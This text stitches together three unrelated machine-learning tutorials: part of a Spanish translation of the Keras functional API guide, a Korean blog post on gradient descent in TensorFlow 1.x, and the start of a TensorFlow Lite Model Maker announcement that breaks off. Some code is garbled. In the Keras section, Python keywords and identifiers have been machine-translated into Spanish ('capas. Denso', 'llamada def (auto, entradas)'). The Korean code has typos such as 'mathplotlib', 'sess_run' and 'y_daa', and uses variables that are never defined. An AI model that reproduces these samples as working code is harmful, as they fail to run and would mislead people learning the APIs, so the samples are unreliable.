x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
decoder = keras.Model(decoder_input, decoder_output, name='decoder')
decoder.summary()
autoencoder_input = keras.Input(shape=(28, 28, 1), name='img')
encoded_img = encoder(autoencoder_input)
decoded_img = decoder(encoded_img)
autoencoder = keras.Model(autoencoder_input, decoded_img, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= original_img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d_4 (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_5 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d_1 (MaxPooling2 (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_6 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_7 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d_1 (Glob (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "decoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= encoded_img (InputLayer) [(None, 16)] 0 _________________________________________________________________ reshape_1 (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose_4 (Conv2DTr (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_5 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d_1 (UpSampling2 (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_6 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_7 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 9,569 Trainable params: 9,569 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ encoder (Functional) (None, 16) 18672 _________________________________________________________________ decoder (Functional) (None, 28, 28, 1) 9569 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
Como puede ver, el modelo puede estar anidado: un modelo puede contener submodelos (ya que un modelo es como una capa).
Un caso de uso común para la anidación de modelos es * ensamblaje *. Como ejemplo, a continuación se explica cómo agrupar un conjunto de modelos en un solo modelo que promedia sus predicciones:
def get_model():
inputs = keras.Input(shape=(128,))
outputs = layers.Dense(1, activation='sigmoid')(inputs)
return keras.Model(inputs, outputs)
model1 = get_model()
model2 = get_model()
model3 = get_model()
inputs = keras.Input(shape=(128,))
y1 = model1(inputs)
y2 = model2(inputs)
y3 = model3(inputs)
outputs = layers.average([y1, y2, y3])
ensemble_model = keras.Model(inputs=inputs, outputs=outputs)
Manipulación de topologías gráficas complejas
Modelos con múltiples entradas y salidas
La API funcional facilita la manipulación de múltiples entradas y salidas. Esto no se puede manejar con la API secuencial.
Aquí hay un ejemplo simple.
Supongamos que está creando un sistema para clasificar los tickets de emisión personalizados por prioridad y enrutarlos al departamento correcto.
Tu modelo tendrá 3 entradas:
Título del ticket (entrada de texto)
Cuerpo del texto del ticket (entrada de texto)
Cualquier etiqueta agregada por el usuario (entrada categórica)
Tendrá dos salidas:
Puntuación de prioridad entre 0 y 1 (salida sigmoidea escalar)
El departamento que debe manejar el ticket (salida softmax sobre el conjunto de departamentos)
Construyamos este modelo en pocas líneas con la API funcional.
num_tags = 12 # Número de etiquetas de problemas únicos
num_words = 10000 # Tamaño del vocabulario obtenido al preprocesar datos de texto
num_departments = 4 # Número de departamentos para predicciones.
title_input = keras.Input(shape=(None,), name='title') # Secuencia de longitud variable de entradas
body_input = keras.Input(shape=(None,), name='body') # Secuencia de longitud variable de entradas
tags_input = keras.Input(shape=(num_tags,), name='tags') # Vectores binarios de tamaño `num_tags`
# Ingresa cada palabra en el título en un vector de 64 dimensiones
title_features = layers.Embedding(num_words, 64)(title_input)
# Ingresa cada palabra en el texto en un vector de 64 dimensiones
body_features = layers.Embedding(num_words, 64)(body_input)
# Reduce la secuencia de palabras ingresadas en el título en un solo vector de 128 dimensiones
title_features = layers.LSTM(128)(title_features)
# Reduce la secuencia de palabras ingresadas en el cuerpo en un solo vector de 32 dimensiones
body_features = layers.LSTM(32)(body_features)
# Combina todas las funciones disponibles en un solo vector grande mediante concatenación
x = layers.concatenate([title_features, body_features, tags_input])
# Pegua una regresión logística para la predicción de prioridad en la parte superior de las características
priority_pred = layers.Dense(1, activation='sigmoid', name='priority')(x)
# Stick a department classifier on top of the features
department_pred = layers.Dense(num_departments, activation='softmax', name='department')(x)
# Instancia un modelo de extremo a extremo que prediga tanto la prioridad como el departamento
model = keras.Model(inputs=[title_input, body_input, tags_input],
outputs=[priority_pred, department_pred])
Ploteando el modelo:
keras.utils.plot_model(model, 'multi_input_and_output_model.png', show_shapes=True)
Al compilar este modelo, podemos asignar diferentes pérdidas a cada salida. Incluso puede asignar diferentes pesos a cada pérdida, para modular su contribución a la pérdida total de entrenamiento.
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss=['binary_crossentropy', 'categorical_crossentropy'],
loss_weights=[1., 0.2])
Como dimos nombres a nuestras capas de salida, también podríamos especificar la pérdida de esta manera:
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss={'priority': 'binary_crossentropy',
'department': 'categorical_crossentropy'},
loss_weights=[1., 0.2])
Podemos entrenar el modelo pasando listas de matrices Numpy de entradas y objetivos:
import numpy as np
# Datos de entrada ficticios
title_data = np.random.randint(num_words, size=(1280, 10))
body_data = np.random.randint(num_words, size=(1280, 100))
tags_data = np.random.randint(2, size=(1280, num_tags)).astype('float32')
# Datos objetivo ficticios
priority_targets = np.random.random(size=(1280, 1))
dept_targets = np.random.randint(2, size=(1280, num_departments))
model.fit({'title': title_data, 'body': body_data, 'tags': tags_data},
{'priority': priority_targets, 'department': dept_targets},
epochs=2,
batch_size=32)
Epoch 1/2 40/40 [==============================] - 0s 12ms/step - loss: 1.3044 - priority_loss: 0.7146 - department_loss: 2.9490 Epoch 2/2 40/40 [==============================] - 0s 11ms/step - loss: 1.2906 - priority_loss: 0.6993 - department_loss: 2.9562 <tensorflow.python.keras.callbacks.History at 0x7fb48ae72f60>
Al llamar al ajuste con un objeto Dataset, debería producir untupla de listas como ([title_data, body_data, tags_data], [priority_targets, dept_targets])o una tupla de diccionarios como({'title': title_data, 'body': body_data, 'tags': tags_data}, {'priority': priority_targets, 'department': dept_targets}).
Para obtener una explicación más detallada, consulta la guía completa Guía de entrenamiento y evaluación.
Un modelo de Red neuronal residual de juguete
Además de los modelos con múltiples entradas y salidas, La API funcional facilita la manipulación de topologías de conectividad no lineal, es decir, modelos donde las capas no están conectadas secuencialmente. Esto tampoco se puede manejar con la API secuencial (como su nombre lo indica).
Un caso de uso común para esto son las conexiones residuales.
Construyamos un modelo de ResNet de juguete para CIFAR10 para demostrar esto.
inputs = keras.Input(shape=(32, 32, 3), name='img')
x = layers.Conv2D(32, 3, activation='relu')(inputs)
x = layers.Conv2D(64, 3, activation='relu')(x)
block_1_output = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_1_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_2_output = layers.add([x, block_1_output])
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_2_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_3_output = layers.add([x, block_2_output])
x = layers.Conv2D(64, 3, activation='relu')(block_3_output)
x = layers.GlobalAveragePooling2D()(x)
x = layers.Dense(256, activation='relu')(x)
x = layers.Dropout(0.5)(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs, outputs, name='toy_resnet')
model.summary()
Model: "toy_resnet" __________________________________________________________________________________________________ Layer (type) Output Shape Param # Connected to ================================================================================================== img (InputLayer) [(None, 32, 32, 3)] 0 __________________________________________________________________________________________________ conv2d_8 (Conv2D) (None, 30, 30, 32) 896 img[0][0] __________________________________________________________________________________________________ conv2d_9 (Conv2D) (None, 28, 28, 64) 18496 conv2d_8[0][0] __________________________________________________________________________________________________ max_pooling2d_2 (MaxPooling2D) (None, 9, 9, 64) 0 conv2d_9[0][0] __________________________________________________________________________________________________ conv2d_10 (Conv2D) (None, 9, 9, 64) 36928 max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_11 (Conv2D) (None, 9, 9, 64) 36928 conv2d_10[0][0] __________________________________________________________________________________________________ add (Add) (None, 9, 9, 64) 0 conv2d_11[0][0] max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_12 (Conv2D) (None, 9, 9, 64) 36928 add[0][0] __________________________________________________________________________________________________ conv2d_13 (Conv2D) (None, 9, 9, 64) 36928 conv2d_12[0][0] __________________________________________________________________________________________________ add_1 (Add) (None, 9, 9, 64) 0 conv2d_13[0][0] add[0][0] __________________________________________________________________________________________________ conv2d_14 (Conv2D) (None, 7, 7, 64) 36928 add_1[0][0] __________________________________________________________________________________________________ global_average_pooling2d (Globa (None, 64) 0 conv2d_14[0][0] __________________________________________________________________________________________________ dense_9 (Dense) (None, 256) 16640 global_average_pooling2d[0][0] __________________________________________________________________________________________________ dropout (Dropout) (None, 256) 0 dense_9[0][0] __________________________________________________________________________________________________ dense_10 (Dense) (None, 10) 2570 dropout[0][0] ================================================================================================== Total params: 223,242 Trainable params: 223,242 Non-trainable params: 0 __________________________________________________________________________________________________
Ploteando el modelo:
keras.utils.plot_model(model, 'mini_resnet.png', show_shapes=True)
Vamos a entrenarlo:
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss='categorical_crossentropy',
metrics=['acc'])
model.fit(x_train, y_train,
batch_size=64,
epochs=1,
validation_split=0.2)
Downloading data from https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz 170500096/170498071 [==============================] - 2s 0us/step 625/625 [==============================] - 4s 6ms/step - loss: 1.8840 - acc: 0.2842 - val_loss: 1.5108 - val_acc: 0.4309 <tensorflow.python.keras.callbacks.History at 0x7fb48a701f28>
Compartir capas
Otro buen uso de la API funcional son los modelos que usan capas compartidas. Las capas compartidas son instancias de capa que se reutilizan varias veces en un mismo modelo: aprenden características que corresponden a múltiples rutas en el gráfico de capas.
Las capas compartidas a menudo se usan para codificar entradas que provienen de espacios similares (por ejemplo, dos piezas de texto diferentes que presentan un vocabulario similar), ya que permiten compartir información entre estas diferentes entradas y hacen posible entrenar un modelo de este tipo en menos datos. Si se ve una palabra determinada en una de las entradas, eso beneficiará el procesamiento de todas las entradas que pasan por la capa compartida.
Para compartir una capa en la API funcional, simplemente llame a la misma instancia de capa varias veces. Por ejemplo, aquí hay una capa Ingresa (del ingles Embedding) compartida entre dos entradas de texto diferentes:
# Ingreso de 1000 palabras únicas asignadas a vectores de 128 dimensiones
shared_embedding = layers.Embedding(1000, 128)
# Secuencia de longitud variable de enteros
text_input_a = keras.Input(shape=(None,), dtype='int32')
# Secuencia de longitud variable de enteros
text_input_b = keras.Input(shape=(None,), dtype='int32')
# Reutilizamos la misma capa para codificar ambas entradas
encoded_input_a = shared_embedding(text_input_a)
encoded_input_b = shared_embedding(text_input_b)
Extracción y reutilización de nodos en el gráfico de capas
Debido a que el gráfico de capas que está manipulando en la API funcional es una estructura de datos estática, se puede acceder e inspeccionarlo. Así es como podemos trazar modelos funcionales como imágenes, por ejemplo.
Esto también significa que podemos acceder a las activaciones de capas intermedias ("nodos" en el gráfico) y reutilizarlas en otros lugares. ¡Esto es extremadamente útil para la extracción de características, por ejemplo!
Veamos un ejemplo. Este es un modelo VGG19 con pesas pre-entrenadas en ImageNet:
from tensorflow.keras.applications import VGG19
vgg19 = VGG19()
Downloading data from https://storage.googleapis.com/tensorflow/keras-applications/vgg19/vgg19_weights_tf_dim_ordering_tf_kernels.h5 574717952/574710816 [==============================] - 2s 0us/step
Y estas son las activaciones intermedias del modelo, obtenidas al consultar la estructura de datos del gráfico:
features_list = [layer.output for layer in vgg19.layers]
Podemos usar estas características para crear un nuevo modelo de extracción de características, que devuelve los valores de las activaciones de la capa intermedia, y podemos hacer todo esto en 3 líneas.
feat_extraction_model = keras.Model(inputs=vgg19.input, outputs=features_list)
img = np.random.random((1, 224, 224, 3)).astype('float32')
extracted_features = feat_extraction_model(img)
Esto es útil cuando implementa la transferencia de estilo neural, entre otras cosas.
Extendiendo la API escribiendo capas personalizadas
tf.keras tiene una amplia gama de capas incorporadas. Aquí están algunos ejemplos:
Capas convolucionales: Conv1D,Conv2D,Conv3D,Conv2DTranspose, etc.
Capas de agrupación: MaxPooling1D,MaxPooling2D,MaxPooling3D,AveragePooling1D, etc.
Capas RNN: GRU,LSTM,ConvLSTM2D, etc.
BatchNormalization,Dropout,Embedded, etc.
Si no encuentras lo que necesitas, es fácil extender la API creando tus propias capas.
Todas las capas subclasifican la clase Layer e implementan:
Un método call, que especifica el cálculo realizado por la capa.
Un método build, que crea los pesos de la capa (tenga en cuenta que esto es solo una convención de estilo; también puede crear pesos en__init__).
Para obtener más información sobre cómo crear capas desde cero, consulta la guía Guía para escribir capas y modelos desde cero.
Aquí hay una implementación simple de una capa Densa:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
Si deseas que tu capa personalizada admita la serialización, también debes definir un método get_config,que devuelve los argumentos del constructor de la instancia de capa:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
def get_config(self):
return {'units': self.units}
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
new_model = keras.Model.from_config(
config, custom_objects={'CustomDense': CustomDense})
Opcionalmente, también podría implementar el método de clase from_config (cls, config), que se encarga de recrear una instancia de capa dado su diccionario de configuración. La implementación predeterminada de from_config es:
def from_config(cls, config):
return cls(**config)
Cuándo usar la API funcional
¿Cómo decidir si usar la API funcional para crear un nuevo modelo o simplemente subclasificar la clase Modelo directamente?
En general, la API funcional es de nivel superior, más fácil y segura de usar, y tiene una serie de características que los modelos de subclases no admiten.
Sin embargo, la subclasificación de modelos le brinda una mayor flexibilidad al crear modelos que no se pueden expresar fácilmente como gráficos acíclicos dirigidos de capas (por ejemplo, no podría implementar un Tree-RNN con la API funcional, tendría que subclasificar Model directamente).
Estas son las fortalezas de la API funcional:
Las propiedades enumeradas a continuación también son ciertas para los modelos secuenciales (que también son estructuras de datos), pero no son ciertas para los modelos subclasificados (que son bytecode de Python, no estructuras de datos).
Es menos detallado.
No super (MyClass, self) .__ init __ (...), no def call (self, ...):, etc.
Comparar:
input = keras.Input (shape = (32,))
x = capas. Denso (64, activación = 'relu') (entradas)
salidas = capas. Denso (10) (x)
mlp = keras.Model (entradas, salidas)
Con la versión subclaseada:
clase MLP (keras.Model):
def __init __ (self, ** kwargs):
super (MLP, self) .__ init __ (** kwargs)
self.dense_1 = capas.Dense (64, activación = 'relu')
self.dense_2 = layers.Dense (10)
llamada def (auto, entradas):
x = self.dense_1 (entradas)
return self.dense_2 (x)
# Instanciar el modelo.
mlp = MLP ()
# Necesario para crear el estado del modelo.
# El modelo no tiene un estado hasta que se llama al menos una vez.
_ = mlp (tf.zeros ((1, 32)))
Valida su modelo mientras lo está definiendo.
En la API funcional, su especificación de entrada (forma y dtype) se crea de antemano (a través de Input), y cada vez que llama a una capa, la capa comprueba que la especificación que se le pasa coincide con sus supuestos, y generará un mensaje de error útil si no.
Esto garantiza que se ejecutará cualquier modelo que pueda construir con la API funcional. Toda la depuración (que no sea la depuración relacionada con la convergencia) ocurrirá estáticamente durante la construcción del modelo, y no en el momento de la ejecución. Esto es similar a la comprobación de tipo en un compilador.
Tu modelo funcional es trazable e inspeccionable.
Puedes trazar el modelo como un gráfico, y puedes acceder fácilmente a los nodos intermedios en este gráfico, por ejemplo, para extraer y reutilizar las activaciones de las capas intermedias, como vimos en un ejemplo anterior:
features_list = [layer.output para la capa en vgg19.layers]
feat_extraction_model = keras.Model (input = vgg19.input, salidas = features_list)
Su modelo funcional puede ser serializado o clonado.
Debido a que un modelo funcional es una estructura de datos en lugar de un fragmento de código, es serializable de forma segura y se puede guardar como un único archivo que le permite recrear exactamente el mismo modelo sin tener acceso a ninguno de los códigos originales. Consulta nuestra guía de guardado y serialización para obtener más detalles.
Estas son las debilidades de la API funcional:
No admite arquitecturas dinámicas.
La API funcional trata los modelos como DAG de capas. Esto es cierto para la mayoría de las arquitecturas de aprendizaje profundo, pero no para todas: por ejemplo, las redes recursivas o los RNN de árbol no siguen este supuesto y no se pueden implementar en la API funcional.
A veces, solo necesitas escribir todo desde cero.
Al escribir actividades avanzadas, es posible que desee hacer cosas que están fuera del alcance de "definir un DAG de capas": por ejemplo, es posible que desee exponer múltiples métodos personalizados de entrenamiento e inferencia en su instancia de modelo. Esto requiere subclases.
Para profundizar más en las diferencias entre la API funcional y la subclasificación de modelos, puede leer ¿Qué son las API simbólicas e imperativas en TensorFlow 2.0?.
Mezcla y combina diferentes estilos de API
Es importante destacar que elegir entre la subclasificación de API funcional o modelo no es una decisión binaria que lo restringe a una categoría de modelos. Todos los modelos en la API tf.keras pueden interactuar con cada uno, ya sean modelos secuenciales, modelos funcionales o modelos / capas subclasificados escritos desde cero.
Siempre puede usar un modelo funcional o modelo secuencial como parte de un modelo / capa subclasificado:
units = 32
timesteps = 10
input_dim = 5
# Define a Functional model
inputs = keras.Input((None, units))
x = layers.GlobalAveragePooling1D()(inputs)
outputs = layers.Dense(1, activation='sigmoid')(x)
model = keras.Model(inputs, outputs)
class CustomRNN(layers.Layer):
def __init__(self):
super(CustomRNN, self).__init__()
self.units = units
self.projection_1 = layers.Dense(units=units, activation='tanh')
self.projection_2 = layers.Dense(units=units, activation='tanh')
# Our previously-defined Functional model
self.classifier = model
def call(self, inputs):
outputs = []
state = tf.zeros(shape=(inputs.shape[0], self.units))
for t in range(inputs.shape[1]):
x = inputs[:, t, :]
h = self.projection_1(x)
y = h + self.projection_2(state)
state = y
outputs.append(y)
features = tf.stack(outputs, axis=1)
print(features.shape)
return self.classifier(features)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, timesteps, input_dim)))
(1, 10, 32)
Inversamente, puede usar cualquier Capa o Modelo subclasificado en la API Funcional siempre que implemente un método call que siga uno de los siguientes patrones:
call (self, input, ** kwargs)dondeinputes un tensor o una estructura anidada de tensores (por ejemplo, una lista de tensores), y donde** kwargsson argumentos no tensoriales (no input )
call (self, input, training = None, ** kwargs)dondetraininges un valor booleano que indica si la capa debe comportarse en modo de entrenamiento y modo de inferencia.
call (self, input, mask = None, ** kwargs)dondemaskes un tensor de máscara booleano (útil para RNN, por ejemplo).
call (self, input, training = None, mask = None, ** kwargs)- por supuesto, puede tener tanto un comportamiento específico de enmascaramiento como de entrenamiento al mismo tiempo.
Además, si implementa el método get_config en su Capa o Modelo personalizado, los modelos funcionales que cree con él seguirán siendo serializables y clonables.
Aquí hay un ejemplo rápido en el que usamos un RNN personalizado escrito desde cero en un modelo funcional:
units = 32
timesteps = 10
input_dim = 5
batch_size = 16
class CustomRNN(layers.Layer):
def __init__(self):
super(CustomRNN, self).__init__()
self.units = units
self.projection_1 = layers.Dense(units=units, activation='tanh')
self.projection_2 = layers.Dense(units=units, activation='tanh')
self.classifier = layers.Dense(1, activation='sigmoid')
def call(self, inputs):
outputs = []
state = tf.zeros(shape=(inputs.shape[0], self.units))
for t in range(inputs.shape[1]):
x = inputs[:, t, :]
h = self.projection_1(x)
y = h + self.projection_2(state)
state = y
outputs.append(y)
features = tf.stack(outputs, axis=1)
return self.classifier(features)
# Tenga en cuenta que especificamos un tamaño de lote estático para las entradas con `batch_shape`
# arg, porque el cálculo interno de `CustomRNN` requiere un tamaño de lote estático
# (cuando creamos el tensor de ceros `estado`).
inputs = keras.Input(batch_shape=(batch_size, timesteps, input_dim))
x = layers.Conv1D(32, 3)(inputs)
outputs = CustomRNN()(x)
model = keras.Model(inputs, outputs)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, 10, 5)))
¡Esto concluye nuestra guía sobre la API funcional "Keras"!
Ahora tienes a tu alcance un poderoso conjunto de herramientas para construir modelos de aprendizaje profundo.
|
2020/01/13
이론 부분에 해당하는 내용은 수식을 표현하는 플러그인을 잘 다룰줄 몰라서 사진으로 찍을수밖에 없어 길어진다…
설명을 위해, Hypothesis를 간소화시켜 살펴보자.
bias 를 의미하는 b를 0이라고 생각하고, Cost function을 W의 함수라고 생각하고아래의 표와 같은 데이터가 있다고 생각해보자.
이와 같은 데이터를 가지고, Cost function에 대입해보면, 아래와 같은 결과를 도출할 수 있다.
W가 2일 경우에도 마찬가지로 4.67과 같은 값을 결과로 갖는다.이를 토대로 여러 값을 대입하여 cost 결과값을 구해보면우리가 기존에 가정한 H(x) = Wx는 위의 표와 같은 데이터에 대해y축을 cost, x축을 W로 둔 그래프에서 아래와 같은 Cost의 분포를 가진다고 할 수 있다.
우리가 목적하는 Cost가 최소가 되는 지점의 W값은 1이 된다는 것을 직관적으로 알 수 있다.하지만 이를 눈으로 보고 아는 것이 아닌, 기계적으로 찾아내려고 한다면 어떻게 해야 할까?
직역하면, “경사를 따라 내려가는” 알고리즘이다.
특징
W와 b 값을 아주 조금씩 변경한다.
경사도(Gradient)에 대해서 설명하기 위해 미분의 개념을 도입할텐데,적용하기에 앞서 기울기에 대한 공식을 먼저 정리한다.
W에서 cost를 미분한 값을 빼서 아주 작은 좌표이동을 하겠다는 의미라고 생각하면 된다. (여기서
이 알고리즘을 여러 번 실행 시켜 W값이 계속해서 변화되면, 그 값이 초반에 살펴보았던 cost를 minimize하는 값이 되는 것이다.
아래의 파란 박스로 표시한 수식이 최종적인 Gradient descent algorithm이다.이 알고리즘을 기계적으로 적용하면, cost function을 최소화 하는 W 값을 구할 수 있고그 것이 바로 Linear Regression의 핵심인 학습을 통해 model을 만드는 과정이라고 이해하면 되겠다.
위의 그림에서와 같은 그래프를 갖는 cost function에서는 우리가 지금까지 생각한 알고리즘이 정상적으로 동작하지 않는다. 왜냐하면 시작점을 다르게 잡았을 때, 경사를 타고 최종 도착하는 최저점이 다른 위치가 되기 때문이다.
다행히도, 우리의 Hypothesis와 Cost function을 가지고 그래프를 그리게 되면 위와 같은그래프를 얻을 수 있는데, 이와 같은 그래프를 Convex Function이라고 한다.이런 경우에는 어느 점에서 시작하든, 도착하는 지점이 우리가 원하는 지점이고우리의 Gradient descent algorithm이 항상 답을 찾는다는 것을 보장해주게 된다.
Cost function을 설계할 때, 반드시 모양이 Convex function이 되는지를 확인하는 것이 굉장히 중요하다.
import tensorflow as tf import mathplotlib as plt X = [1, 2, 3] Y = [1, 2, 3] W = tf.placeholder(tf.float32) # Our hypothesis for linear model X * W hypothesis = X * W # cost/loss function cost = tf.reduce_mean(tf.square(hypothesis - Y)) # Launch the graph in a session. sess = tf.Session() # Initialize global variables in the graph. sess.run(tf.global_variables_initializer()) # Variables for plotting cost function W_val = [] cost_val = [] for i in range(-30, 50): feed_W = i * 0.1 curr_cost, curr_W = sess.run([cost, W], feed_dict={W: feed_W}) W_val.append(curr_W) cost_val.append(curr_cost) # Show the cost function plt.plot(W_val, cost_val) plt.show()
위의 코드는 주어진 데이터 X와 Y에 대하여 우리의 가설 함수 H(x) = W * X의cost function의 그래프를 그리는 프로그램이라고 할 수 있겠다.-3에서부터 5까지 W를 0.1만큼씩 변화하도록 실행하여 현재의 cost, 그리고 W 값을리스트에 저장하여 그 리스트로 하여금 어떠한 그래프를 나타내는지를 시각화해주는 코드이다.(mathplot이라는 라이브러리가 그러한 동작을 하도록 하는 모양이다.)
plot.show()를 통해 나타나는 결과는 아래와 같다.
이제 Gradient descent를 적용할 단계인데, 그에 대한 설명이 이어진다.
이론 시간에 학습했던 것처럼, 경사를 타고 내려가는 알고리즘이 동작하는 방식은현재의 W 값에서 cost function을 미분한 값(그래프의 기울기)를 빼줌으로서 조정하여그래프의 면을 타고 내려가는 방식이다. (기울기가 음수일때는 커지는 방향으로)
이를 tensorflow로 구현하는 것은 수식을 그대로 옮겨서 표현하면 된다.
learning_rate = 0.1 gradient = tf.reduce_mean((W * X - Y) * X) # cost를 미분한 기울기값. descent = W - learning_rate * gradient update = W.assign(descent) # 새로운 W 획득 (할당), =으로 assign 할 수 없음.
전체 코드를 살펴보면 다음과 같다.
import tensorflow as tf x_data = [1, 2, 3] y_data = [1, 2, 3] W = tf.Variable(tf.random_normal([1]), name='weight') X = tf.placeholder(tf.float32) Y = tf.placeholder(tf.float32) # Our hypothesis for linear model X * W hypothesis = X * W # cost/loss function cost = tf.reduce_sum(tf.square(hypothesis - Y)) # Minimize: Gradient Descent using derivative: W -= learning rate * derivative learning_rate = 0.1 gradient = tf.reduce_mean((W * X - Y) * X) descent = W - learning_rate * gradient update = W.assign(descent) # Launch the graph in a session. sess = tf.Session() # Initialize global variables in the graph. sess.run(tf.global_variables_initializer()) for step in range(21): sess.run(update, feed_dict={X: x_data, Y: y_data}) print(step, sess_run(cost, feed_dict={X: x_data, Y: y_daa}), sess.run(W))
이 코드에 대한 결과는 아래와 같다.
프린트 문에 의해 한 라인에 출력된 내용은 step, cost, W의 순서인데수동으로 직접 구현해서 실행해보았는데도 매우 잘 동작하는 것을 확인할 수 있었다.
Gradient Descent의 원리를 직접 실습하기 위해 직접 미분하여 결과를 도출했지만 우리의 cost function이 간단하게 주어졌기 때문에 간단하게 미분하여 작성할 수 있었고 이는 매우 복잡해질 수 있기 때문에 TensorFlow를 사용할 때 이를 일일히 작성하는 것은 힘든 일이다.
아래와 같이 코드를 작성하면 TensorFlow가 일을 직접 자동으로 실행해준다.
# Minimize: Gradient Descent Magic optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1) train = optimizer.minimize(cost)
위의 전체 코드에서 W = tf.Variable(tf.random_normal([1]), name='weight')을 5.0 혹은 -3.0과 같이 멀리 떨어진 값으로 직접 값을 지정해 주어도올바른 결과를 도출하는 모습을 확인할 수 있었다.
만약에 TensorFlow가 제공하는 gradient 값을 임의로 조정하고 싶다면 아래와 같은 로직을 확인해볼 수 있다.
import tensorflow as tf x_data = [1, 2, 3] y_data = [1, 2, 3] # Set wrong model weights W = tf.Variable(5.) # Our hypothesis for linear model X * W hypothesis = X * W # Manual gradient gradient = tf.reduce_mean((W * X - Y) * X) * 2 # cost/loss function cost = tf.reduce_mean(tf.square(hypothesis - Y)) optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01) # Get gradients gvs = optimizer.compute_gradients(cost) # Apply gradients apply_gradients = optimizer.apply_gradients(gvs) # Launch the graph in a session. sess = tf.Session() sess.run(tf.global_variables_initializer()) for step in range(100): print(step, sess_run([gradient, W, gvs])) sess.run(apply_gradients)
위 코드는 직접 수식으로 작성한 gradient와 실제로 minimize를 할 때 optimizer가 도출하는 gradient 값이 차이를 보일지를 실험해보기 위한 코드이다.
compute_gradient를 통해 gradient를 조작할수 있다고 한다. 여기서는 조작 없이 값을 원래대로 넣어 비교 실험을 위해 작성하였다.
결과는 아래와 같다.
수식을 직접 작성한 gradient와 optimizer가 생성하는 gradient의 값,그리고 그로 인해 연산된 W 값은 소수점 정밀도의 미미한 차이만 있을 뿐 같은 값을 가진다는것을 확인할 수 있었다.
결과와 출력문의 구조가 혼동될 수도 있을 것 같아 덧붙이자면,print(step, sess.run([gradient, W, gvs]))와 같이 작성하였는데 출력의 첫 줄과 비교해보면0 은 step에 해당하고, 37.333332는 gradient, 5.0은 W, 그 뒤에 뒤따르는 배열 내의두 원소는 compute_gradient에 의한 gradient와 W값을 의미한다.
|
April 14, 2020 — Posted by Khanh LeViet, Developer Advocate
TensorFlow Lite is the official framework to run inference with TensorFlow models on edge devices. TensorFlow Lite is deployed on more than 4 billions edge devices worldwide, supporting Android, iOS, Linux-based IoT devices and microcontrollers.
Since first launch in late 2017, we have been improving TensorFlow Lite to make it robust while keeping it easy…
Benchmark on Pixel 4 CPU, 4 Threads, March 2020
Benchmark on Pixel 4 CPU, 4 Threads, March 2020
Model hyper parameters: Sequence length 128, Vocab size 30K
data = ImageClassifierDataLoader.from_folder('flower_photos/')
model = image_classifier.create(data)
loss, accuracy = model.evaluate()
model.export('flower_classifier.tflite', 'flower_label.txt', with_metadata=True)
Model Maker supports many state-of-the-art models that are available on TensorFlow Hub, including the EfficientNet-Lite models. If you want to get higher accuracy, you can switch to a different model architecture by changing just one line of code while keeping the rest of your training pipeline.
# EfficinetNet-Lite2.
model = image_classifier.create(data, efficientnet_lite2_spec)
# ResNet 50.
model = image_classifier.create(data, resnet_50_spec)
Model Maker currently supports two use cases: image classification (tutorial) and text classification (tutorial), with more computer vision and NLP use cases coming soon.
# Creates model info.
